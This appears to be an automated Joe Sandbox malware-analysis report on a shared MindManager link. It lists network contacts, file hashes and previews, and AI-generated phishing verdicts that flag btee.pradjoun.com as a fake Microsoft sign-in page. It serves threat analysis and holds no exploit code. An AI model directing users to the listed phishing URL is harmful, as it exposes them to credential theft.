                                                                15169GOOGLEUSfalse
                                                                216.58.212.174
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                95.101.111.130
                                                                unknownEuropean Union
                                                                12956TELEFONICATELXIUSESfalse
                                                                66.102.1.84
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                65.9.86.56
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                1.1.1.1
                                                                unknownAustralia
                                                                13335CLOUDFLARENETUSfalse
                                                                52.58.155.53
                                                                share.mindmanager.comUnited States
                                                                16509AMAZON-02USfalse
                                                                18.154.84.60
                                                                cdn.amplitude.comUnited States
                                                                16509AMAZON-02USfalse
                                                                104.19.178.52
                                                                cdn.cookielaw.orgUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                142.250.185.132
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                140.82.121.4
                                                                github.comUnited States
                                                                36459GITHUBUSfalse
                                                                142.250.185.238
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.185.136
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                216.58.206.46
                                                                plus.l.google.comUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.186.106
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.181.227
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                108.156.60.10
                                                                unknownUnited States
                                                                16509AMAZON-02USfalse
                                                                239.255.255.250
                                                                unknownReserved
                                                                unknownunknownfalse
                                                                142.250.185.196
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                188.114.97.3
                                                                z5eq.081zq.comEuropean Union
                                                                13335CLOUDFLARENETUSfalse
                                                                108.156.60.35
                                                                us.sharing.mindmanager.comUnited States
                                                                16509AMAZON-02USfalse
                                                                142.250.185.194
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                13.33.187.96
                                                                d19d360lklgih4.cloudfront.netUnited States
                                                                16509AMAZON-02USfalse
                                                                188.114.96.3
                                                                btee.pradjoun.comEuropean Union
                                                                13335CLOUDFLARENETUStrue
                                                                142.250.186.142
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                142.250.186.100
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                104.17.2.184
                                                                unknownUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                104.17.25.14
                                                                cdnjs.cloudflare.comUnited States
                                                                13335CLOUDFLARENETUSfalse
                                                                172.217.18.100
                                                                unknownUnited States
                                                                15169GOOGLEUSfalse
                                                                IP
                                                                192.168.2.17
                                                                Joe Sandbox version:40.0.0 Tourmaline
                                                                Analysis ID:1467811
                                                                Start date and time:2024-07-04 20:03:47 +02:00
                                                                Joe Sandbox product:CloudBasic
                                                                Overall analysis duration:
                                                                Hypervisor based Inspection enabled:false
                                                                Report type:full
                                                                Cookbook file name:defaultwindowsinteractivecookbook.jbs
                                                                Sample URL:https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6
                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                Number of analysed new started processes analysed:17
                                                                Number of new started drivers analysed:0
                                                                Number of existing processes analysed:0
                                                                Number of existing drivers analysed:0
                                                                Number of injected processes analysed:0
                                                                Technologies:
                                                                • EGA enabled
                                                                Analysis Mode:stream
                                                                Analysis stop reason:Timeout
                                                                Detection:MAL
                                                                Classification:mal68.phis.win@17/491@76/437
                                                                • Exclude process from analysis (whitelisted): SIHClient.exe
                                                                • Excluded IPs from analysis (whitelisted): 142.250.181.227, 216.58.212.174, 66.102.1.84, 34.104.35.123, 142.250.185.78, 142.250.185.136, 95.101.111.130, 95.101.111.148, 142.250.186.106, 216.58.206.74, 172.217.18.10, 216.58.206.42, 216.58.212.170, 142.250.181.234, 142.250.186.138, 142.250.184.234, 142.250.186.170, 172.217.16.202, 172.217.18.106, 142.250.186.42, 142.250.184.202, 142.250.74.202, 172.217.16.138, 142.250.185.74
                                                                • Excluded domains from analysis (whitelisted): clientservices.googleapis.com
                                                                • Not all processes where analyzed, report is missing behavior information
                                                                • VT rate limit hit for: https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6
                                                                InputOutput
                                                                URL: https://share.mindmanager.com/#publish/mnPTcUqLfLnU6HRHMb6xC3qXYGZYU6tmBtOy3sS6 Model: Perplexity: mixtral-8x7b-instruct
                                                                {"loginform": false,"urgency": false,"captcha": false,"reasons": ["The webpage does not contain a login form, as there is no explicit request for sensitive information such as passwords, email addresses, usernames, phone numbers, or credit card numbers.","The text does not create a sense of urgency, as it does not contain phrases that urge the user to take immediate action, such as 'Click here to view document', 'To view secured document click here', or 'Open the link to see your invoice'.","The webpage does not contain a CAPTCHA or any other anti-robot detection mechanism."]}
                                                                Title: Visualize with MindManager OCR: Loading... 
                                                                URL: https://btee.pradjoun.com/4568592340690659807886655klzbsrguyuiguljwwp?pekjpjlosdbcmbuaikynxsqu415599126942126195349977DVOJZSOYLHJAELYCOVVQ Model: Perplexity: mixtral-8x7b-instruct
                                                                {"loginform": true,"urgency": false,"captcha": false,"reasons": ["The webpage contains a login form which explicitly requests sensitive information such as email addresses and passwords.","There is no sense of urgency created in the text.","There is no CAPTCHA or anti-robot detection mechanism present on the webpage."]}
                                                                Title: Mental Health OCR: Microsoft Sign in Email, phone, or Skype No account? Create one! Can't access your account? Next Sign-in options Terms of use Privacy & cookies 
                                                                URL: https://btee.pradjoun.com Model: gpt-4o
                                                                ```json{  "phishing_score": 9,  "brands": "Microsoft",  "phishing": true,  "suspicious_domain": true,  "has_prominent_loginform": true,  "has_captcha": false,  "setechniques": true,  "has_suspicious_link": true,  "legitmate_domain": "microsoft.com",  "reasons": "The URL 'https://btee.pradjoun.com' does not match the legitimate domain 'microsoft.com' associated with the Microsoft brand. The webpage closely resembles the legitimate Microsoft login page, which is a common social engineering technique used in phishing attacks. The presence of a prominent login form asking for sensitive information (email, phone, or Skype) further raises suspicion. Additionally, the domain 'pradjoun.com' is not associated with Microsoft, making it highly likely that this is a phishing site."}
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jul 4 17:04:19 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2677
                                                                Entropy (8bit):4.001660656382377
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:942F91C5929B7F7C4D96917E870C162D
                                                                SHA1:EEDB45589A7107BDED2044BB46872A4CB1A0D197
                                                                SHA-256:FB54C3A554669AC784B6DD7E0870EA295F7839B28BAA3976A393F2CE18D9993E
                                                                SHA-512:39C5970D092478793A01C4C749BC570946AA0E43A5752AC5D132052746446BC17569A73F44603D8EE29412AC68270001FDA954B5568D384B557CC29DA5011BFC
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,....R]d.<.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jul 4 17:04:19 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2679
                                                                Entropy (8bit):4.017651925081207
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ED4D1845AE9DE9C6ACAEAF869689AB1C
                                                                SHA1:EF0900D396A0F7ED06B4AAE3F1F0254C302DE506
                                                                SHA-256:B9B6A7E07860313A48B119761DA8DFE70225163BC97DA421278639E4126369A8
                                                                SHA-512:24906AC93AB26E5CD5C31A05CF41D779432DA82C52E5C8DD98DD6CFD9E523111B7AA3ACEB1335BE6BD04C60F0481DD9EE0896F939BDA6182B67F4EA07F3EED6B
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....9Y.<.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:54:41 2023, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2693
                                                                Entropy (8bit):4.024107153500093
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:40E83A5D9713645E85440D37025B56D2
                                                                SHA1:5A56BE475D9B6A9865A160913B8E13C6555B3034
                                                                SHA-256:3D9F57F74D0AEC1EADC7B53319D9AC392A952E42F29543443542C09FD1E1656A
                                                                SHA-512:65E0C30E8D6BC97EC51C9D323CD66588EEEA313531D890284BE5C01211904E9D5EF67BE5F3AD16015E13DBB0E093DBE4CF6C6D2114EF701834A121E934F76AFB
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....v. ;.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.VFW.N...........................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jul 4 17:04:19 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2681
                                                                Entropy (8bit):4.013148162994068
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:081A4B3B5CCDA51C8D6F0DE74E10BD83
                                                                SHA1:A5BABF79054971BF478E79C7442D36D854312CE6
                                                                SHA-256:30E5DD0D38AD19997C3BA6474BF882A54BA92DC82280353846174A4D90F49843
                                                                SHA-512:07042A6588894FF76760B2154706C0B72FE7E229EFD9EEF44EABB857041A826DD3EB4613627979BC9F4AC7E263EEECAC371D09FCA6E842D12029CC8689EFA3DA
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,....UmS.<.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jul 4 17:04:19 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2681
                                                                Entropy (8bit):4.004468491791489
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:5B662869DEBFB5BC654B7B2C74446B15
                                                                SHA1:47D12BBD2FC67C12812FB3338D42EA35A2DCBE47
                                                                SHA-256:3E1CC688A675CAB08AB3317DA8C6C8B65CAC86D690566481E74BAB19230B1A9F
                                                                SHA-512:FD70D266BEAAECB0F626D7062B4D1135D68DED5C51D0B4D6675735025E5EC29B81491BBE46479426BCD5BF0FBD28A968938264D44FC6997A28835D78B35407CD
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....^.<.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Thu Jul 4 17:04:19 2024, atime=Mon Oct 2 20:46:57 2023, length=1210144, window=hide
                                                                Category:dropped
                                                                Size (bytes):2683
                                                                Entropy (8bit):4.017661432458315
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:F3A5F133377C9538CB0193BDBB2E7DFA
                                                                SHA1:14BE7F84DB2E90E8E9BEA844F88201C036EEC634
                                                                SHA-256:9385870323F36E2CC0A58B364C349F4B2B3CA4D32D75A8BA0005AA68F28EA8A7
                                                                SHA-512:52314475280C10FD4B7B8E2A2C2A09E1F6C6013A66A4EF35FA09FC9572D7F6F3A9BE0723758C4949E45C6DFE427B329AE46AAB141B735DA73072D55F75B07B79
                                                                Malicious:false
                                                                Reputation:unknown
                                                                Preview:L..................F.@.. ...$+.,.....EJ.<.......y... w......................1....P.O. .:i.....+00.../C:\.....................1.....FWoN..PROGRA~1..t......O.I.X......B...............J.........P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X......L.....................p+j.G.o.o.g.l.e.....T.1.....FW.N..Chrome..>......CW.V.X......M......................W..C.h.r.o.m.e.....`.1.....FW.N..APPLIC~1..H......CW.V.X.............................W..A.p.p.l.i.c.a.t.i.o.n.....n.2. w..BW. .CHROME~1.EXE..R......CW.V.X.............................3.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i............T.......C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):512
                                                                Entropy (8bit):5.163664728873764
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:37E05923F4AFB1317EAB7F9926E62B08
                                                                SHA1:B33C9A4760A376AECA5335437DA0D78AFC09733D
                                                                SHA-256:6486ED04468A55CBB8BA4F329495CC60CFB46369F9030FE51DDE48B4AD73F9B1
                                                                SHA-512:D12AD3F917D94CC1BBE09DB49AF9F0EF67E728DC8CA761D0C1D67142A8F1E5B1072A650C56FB209C6188BD119F4B55B6DD7632C60B62EBB4DB4F141CA44CB1E0
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/toolbar/svg/context_columns.svg
                                                                Preview:<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 13"><defs><style>.cls-1{fill:#fff;}.cls-2{fill:gray;}.cls-3{fill:none;stroke:gray;stroke-miterlimit:10;}</style></defs><title>Smart-Shape-Menu-Vswim</title><g id="Layer_2" data-name="Layer 2"><g id="Layer_1-2" data-name="Layer 1"><rect class="cls-1" x="0.5" y="0.5" width="15" height="12"/><path class="cls-2" d="M15,1V12H1V1H15m1-1H0V13H16V0Z"/><line class="cls-3" x1="10.5" x2="10.5" y2="12"/><line class="cls-3" x1="5.5" x2="5.5" y2="12"/></g></g></svg>
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:ASCII text, with very long lines (65447)
                                                                Category:downloaded
                                                                Size (bytes):7026725
                                                                Entropy (8bit):5.530416991509378
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:D0A5EC05029AA8D54C951E031398A13D
                                                                SHA1:13B92E5762D26791E9BAE8170F910A67765B3B93
                                                                SHA-256:79B237AF72A1DAE45C9E27509DDA354E522C242A8E0E8B62021D3D59C2721D4E
                                                                SHA-512:7ABA7A55A9F07ECBCF969172B7FB7B9AA868FC9F74E49642CF8299D1FD62DFB2689E842069DCC8DD42E78642088985C48A7A0587C030F4FA161F42B9FEF9F53D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/js/app.min.js?v=23.2.206
                                                                Preview:/*! jQuery v3.6.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,y=n.hasOwnProperty,a=y.toString,l=a.call(Object),v={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1373
                                                                Entropy (8bit):4.7500594355262376
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:08FA01D404F3CCEC5E82A31005AA946D
                                                                SHA1:64BECB9C971C64F12AD3C528410059F8227DC3AE
                                                                SHA-256:C556F10CB161933AF41FE67B5448240611F9C8EED47B7005B47686BFBECB5B40
                                                                SHA-512:68224675AD561BDCB4011620B5CF598913BBEBE6E275D9BEDCB2453B933543797039DE158B96888D214DAA98F3C26214A3FFD935A983FE4D3B7C1F83272F7D3A
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/PrioritiesSVG/roPriority05.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:#9e55ff;}.cls-2{fill:#8430f0;}.cls-3{fill:#fff;}.cls-4{fill:gray;}</style></defs><title>roPriority05</title><rect class="cls-1" x="0.5" y="0.5" width="15" height="15" rx="0.5" ry="0.5"/><path class="cls-2" d="M15,1V15H1V1H15m0-1H1A1,1,0,0,0,0,1V15a1,1,0,0,0,1,1H15a1,1,0,0,0,1-1V1a1,1,0,0,0-1-1Z"/><path class="cls-2" d="M4.85,11.85,6,10a2.91,2.91,0,0,0,2,.9,1.54,1.54,0,0,0,1-.33,1.09,1.09,0,0,0,.43-.9A1.06,1.06,0,0,0,9,8.72a1.83,1.83,0,0,0-1.15-.34,2.9,2.9,0,0,0-1.34.34l-1.3-.49L5.62,3H11V5H7.75L7.69,6h0a1.63,1.63,0,0,0,.72.31A3.61,3.61,0,0,1,11,7.24,3.21,3.21,0,0,1,12,9.6a3.43,3.43,0,0,1-1,2.56,3.68,3.68,0,0,1-2.67,1A4.74,4.74,0,0,1,4.85,11.85Z"/><path class="cls-3" d="M3.85,10.85,5,9a2.91,2.91,0,0,0,2,.9,1.54,1.54,0,0,0,1-.33,1.09,1.09,0,0,0,.43-.9A1.06,1.06,0,0,0,8,7.72a1.83,1.83,0,0,0-1.15-.34,2.9,2.9,0,0,0-1.34.34l-1.3-.49L4.62,2H10V4H6.75L6.69,5h0a1.63,1.63,0,0,0,.
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):76422
                                                                Entropy (8bit):4.122407030018111
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:EEDA1F8069435EB13A294380B85E339A
                                                                SHA1:E64CE8225D9FF6F90D83DD5A60D117554B841A3C
                                                                SHA-256:51C7077D26FB22B31112BA9F282F8956CC32D4423C97FA4D5647DA44789D8177
                                                                SHA-512:12A0051B041312FF17CF0598D1286AF315129068901BA440E66D7910751DF77419CD83CE0A0BBC9BAF01BF81BE9370BD7F4B477B142AFC9687DA6C6CCFAD71D3
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/cloud-templates/use-cases/cards/cards_mindmapping.svg
                                                                Preview:<svg width="200" height="250" viewBox="0 0 200 250" fill="none" xmlns="http://www.w3.org/2000/svg">..<g clip-path="url(#clip0_456_5079)">..<rect width="200" height="250" rx="10" fill="#FFDAC3"/>..<path d="M29.0691 82.674C17.8519 97.8619 16.1954 117.936 22.7187 135.213C29.2421 152.489 43.3277 166.983 60.2983 176.936C82.4325 189.918 110.798 195.47 135.898 188.09C160.998 180.71 181.233 158.978 180.998 135.178C180.884 123.74 175.776 106.547 164.5 101.296C153.633 96.236 141.658 96.7947 130.7 91.8965C111.067 83.1202 109.99 63.7734 86.5 59.2965C67.8602 55.7445 38.9387 69.3107 29.0691 82.674Z" fill="#F6C2A2"/>..<path fill-rule="evenodd" clip-rule="evenodd" d="M36.3045 84.2133C35.3611 84.2133 34.4564 84.588 33.7893 85.2551C33.1222 85.9222 32.7475 86.827 32.7475 87.7704V94.8908C32.7475 95.1946 32.5012 95.4408 32.1975 95.4408C31.8937 95.4408 31.6475 95.1946 31.6475 94.8908V87.7704C31.6475 86.5352 32.1381 85.3507 33.0115 84.4773C33.8849 83.6039 35.0694 83.1133 36.3045 83.1133H81.8464C82.1502 83.11
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):1852
                                                                Entropy (8bit):4.161263958037009
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:21017E6540A271BEAC5331F32C8598B8
                                                                SHA1:3EB810FB40C3146B16442FF8C6C2464151B693F2
                                                                SHA-256:6210838197A8375DF4A71F0A308B5492EAE32494483B3C159E5C4BF7CA7065C7
                                                                SHA-512:50C4CB14FBCB74A1E433C939990F7D0B60E7F9FDBD1DBAD69C0D1C4064CD78DA44F9D0EEC9E60C4756CFFD5415062FF74D2B78F63C6407C6AD8E78A1D500A27D
                                                                Malicious:false
                                                                Reputation:unknown
                                                                URL:https://share.mindmanager.com/images/modern/topic_info_icon_formula.svg
                                                                Preview:<svg id="Layer_1" data-name="Layer 1" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16"><defs><style>.cls-1{fill:gray;}</style></defs><title>topic_info_icon_formula</title><path class="cls-1" d="M8.25,4,8.09,5H6.84l-1,4A21.49,21.49,0,0,1,4.63,12.8a6.59,6.59,0,0,1-1.94,2.64A2.72,2.72,0,0,1,1.11,16a1.27,1.27,0,0,1-.87-.31A.68.68,0,0,1,0,15.13a.6.6,0,0,1,.22-.47.76.76,0,0,1,.54-.21.56.56,0,0,1,.39.15.47.47,0,0,1,.16.34.48.48,0,0,1-.18.35c-.1.08-.14.14-.14.18a.14.14,0,0,0,.06.12.38.38,0,0,0,.24.06A1.65,1.65,0,0,0,2,15.42a2.35,2.35,0,0,0,.72-.69,5.43,5.43,0,0,0,.6-1.33c.08-.24.3-1,.65-2.38L5.5,5H4l.12-.36a3.72,3.72,0,0,0,1-.09,1.32,1.32,0,0,0,.52-.38,6.23,6.23,0,0,0,.62-1,8.24,8.24,0,0,1,1-1.59A4.67,4.67,0,0,1,8.56.38,2.84,2.84,0,0,1,9.88,0a1.56,1.56,0,0,1,1,.33.93.93,0,0,1,.4.72.69.69,0,0,1-.2.5.66.66,0,0,1-.5.21.6.6,0,0,1-.44-.16A.48.48,0,0,1,10,1.24.67.67,0,0,1,10.13.9a1,1,0,0,0,.11-.27.22.22,0,0,0-.08-.18A.5.5,0,0,0,9.83.36a1.57,1.57,0,0,0-1,.34,4.06,4.06,0,0,0-1,1.43A13.61,13.61,0
                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                File Type:SVG Scalable Vector Graphics image
                                                                Category:downloaded
                                                                Size (bytes):977
                                                                Entropy (8bit):5.040048455660643
                                                                Encrypted:false
                                                                SSDEEP:
                                                                MD5:ABEBCB717F987D0DCC6AEF82F14E1A64
                                                                SHA1:616CD7835E1D642924C55A7EA6B98A8E9BB04562
